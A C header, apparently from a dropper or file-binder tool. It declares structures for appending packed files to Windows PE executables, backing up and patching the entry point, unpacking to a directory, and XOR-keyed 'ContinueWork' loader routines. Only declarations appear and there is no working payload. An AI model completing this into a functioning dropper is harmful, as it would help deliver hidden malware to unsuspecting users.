#ifndef DROP_H
#define DROP_H

#include "DATATYPE.h"
#include "PE_FORMAT.h"

#define MakePtr( cast, ptr, addValue ) (cast)( (unsigned char*)(ptr) + (DWORD)(addValue))

typedef struct _AppendFile
{
	ULONG signature;
	char fileName[16];
	ULONG fileSize;
	ULONG packFileSize;
} AppendFile;

typedef struct _PEInfo
{
	HANDLE hPEFile;									// 0000
	HANDLE hMappedFile;								// 0004
	LPVOID FileBase;								// 0008
	PIMAGE_DOS_HEADER ImageDosHeader;				// 000C
	PIMAGE_NT_HEADERS ImageNtHeaders;				// 0010
	PIMAGE_FILE_HEADER ImageFileHeader;				// 0014
	PIMAGE_OPTIONAL_HEADER ImageOptionalHeader;		// 0018
	PIMAGE_SECTION_HEADER WorkingSection;			// 001C
	DWORD fileSize;									// 0020
	DWORD oldHeaderSize;							// 0024
	LPVOID OldEntryBackup;							// 0028
	DWORD EntryPointOffset;							// 002C
} PEInfo;

typedef PEInfo* PEInfoPtr;

typedef struct _LoaderInfo
{
	PEInfo *pPEInfo;
	DWORD CurrentOffset;
	BYTE UnpackDir[128];
} LoaderInfo;

#ifdef __cplusplus
	extern "C" {
#endif

	DWORD __stdcall RvaToOffset(DWORD Rva, PIMAGE_NT_HEADERS ImageNtHeaders);
	DWORD __stdcall OffsetToRva(DWORD Offset, PIMAGE_NT_HEADERS ImageNtHeaders);
	PIMAGE_SECTION_HEADER __stdcall GetEnclosingSectionHeader(DWORD rva, PIMAGE_NT_HEADERS pNTHeader);
	DWORD __stdcall RoundUp(DWORD value, DWORD base);
	DWORD __stdcall IntervalRand(DWORD Low, DWORD High);
	BOOL __stdcall ContinueWork(LoaderInfo *pInfo, DWORD xorPattern, BOOL DebugVersion);
	BOOL __stdcall DllContinueWork(LoaderInfo *pInfo, DWORD xorPattern, char* InvokeApi, BOOL DebugVersion);

#ifdef __cplusplus
	}
#endif

extern LoaderInfo g_LoaderInfo;

#endif
